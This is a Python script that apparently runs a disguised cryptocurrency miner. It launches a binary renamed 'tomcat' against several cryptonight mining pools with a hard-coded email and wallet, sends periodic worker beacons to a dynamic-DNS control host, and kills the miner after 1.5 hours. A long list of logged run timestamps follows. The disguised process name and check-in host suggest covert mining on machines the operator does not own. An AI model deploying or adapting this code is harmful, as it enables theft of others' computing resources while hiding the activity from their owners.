import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:03.886114
#2018-02-17 17:08:07.782359
#2018-02-17 18:56:05.891969
#2018-02-17 20:36:05.758122
#2018-02-17 22:22:02.044943
#2018-02-18 00:05:07.757685
#2018-02-18 01:56:02.047434
#2018-02-18 03:43:08.114475
#2018-02-18 05:30:04.871795
#2018-02-18 07:22:01.600929
#2018-02-18 09:10:06.789411
#2018-02-18 10:55:08.985029
#2018-02-18 12:43:07.202815
#2018-02-18 14:30:04.504901
#2018-02-18 16:21:01.405443
#2018-02-18 18:10:05.173283
#2018-02-18 19:55:07.613527
#2018-02-18 21:42:04.615168
#2018-02-18 23:31:05.065085
#2018-02-19 01:17:04.953816
#2018-02-19 03:04:01.600908
#2018-02-19 04:49:07.626977
#2018-02-19 06:36:05.447573
#2018-02-19 08:26:03.888429
#2018-02-19 10:15:04.969503
#2018-02-19 12:04:08.535004
#2018-02-19 13:52:05.751757
#2018-02-19 15:40:09.960198
#2018-02-19 17:27:06.588417
#2018-02-19 19:15:06.552356
#2018-02-19 21:04:04.550942
#2018-02-19 22:52:04.661087
#2018-02-20 00:36:04.287354
#2018-02-20 02:25:03.728660
#2018-02-20 04:15:05.679690
#2018-02-20 05:58:01.242752
#2018-02-20 07:44:03.514338
#2018-02-20 09:28:02.093985
#2018-02-20 11:11:10.530674
#2018-02-20 12:58:06.213486
#2018-02-20 14:43:02.014282
#2018-02-20 16:29:02.224624
#2018-02-20 18:16:06.033919
#2018-02-20 20:08:04.502815
#2018-02-20 21:56:01.407250
#2018-02-20 23:36:05.413197
#2018-02-21 01:20:01.685643
#2018-02-21 03:07:01.231988
#2018-02-21 04:53:04.938032
#2018-02-21 06:42:08.193407
#2018-02-21 08:28:06.146957
#2018-02-21 10:13:05.815273
#2018-02-21 12:01:07.936910
#2018-02-21 13:51:10.104696
#2018-02-21 15:35:08.244571
#2018-02-21 17:24:01.886352
#2018-02-21 19:12:05.146020
#2018-02-21 21:01:07.508302
#2018-02-21 22:47:06.004626
#2018-02-22 00:32:07.608814
#2018-02-22 02:21:07.801170
#2018-02-22 04:09:05.277664
#2018-02-22 05:54:01.348467
#2018-02-22 07:40:08.282525
#2018-02-22 09:28:06.331640
#2018-02-22 11:14:04.054828
#2018-02-22 13:00:11.697806
#2018-02-22 14:47:12.627948
#2018-02-22 16:34:07.890923
#2018-02-22 18:20:06.631293
#2018-02-22 20:11:08.618055
#2018-02-22 21:58:06.380261
#2018-02-22 23:45:06.532400
#2018-02-23 01:33:05.526201
#2018-02-23 03:21:01.471464
#2018-02-23 05:07:04.329588
#2018-02-23 06:52:06.996355
#2018-02-23 08:42:07.511633
#2018-02-23 10:59:06.541754
#2018-02-23 12:54:06.738348
#2018-02-23 14:38:01.804397
#2018-02-23 16:27:08.178941
#2018-02-23 18:15:09.732391
#2018-02-23 20:07:01.403791
#2018-02-23 21:54:05.820586
#2018-02-23 23:44:04.327121
#2018-02-24 01:36:07.881254
#2018-02-24 03:24:07.973590
#2018-02-24 05:09:06.255612
#2018-02-24 06:58:01.260441
#2018-02-24 08:48:05.966073
#2018-02-24 10:49:06.211156
#2018-02-24 12:36:06.477116
#2018-02-24 14:25:05.194611
#2018-02-24 16:13:01.294082
#2018-02-24 18:06:03.666763
#2018-02-24 19:52:07.204472
#2018-02-24 21:36:08.436394
#2018-02-25 00:25:08.459420
#2018-02-25 03:31:01.579704
#2018-02-25 07:20:08.798796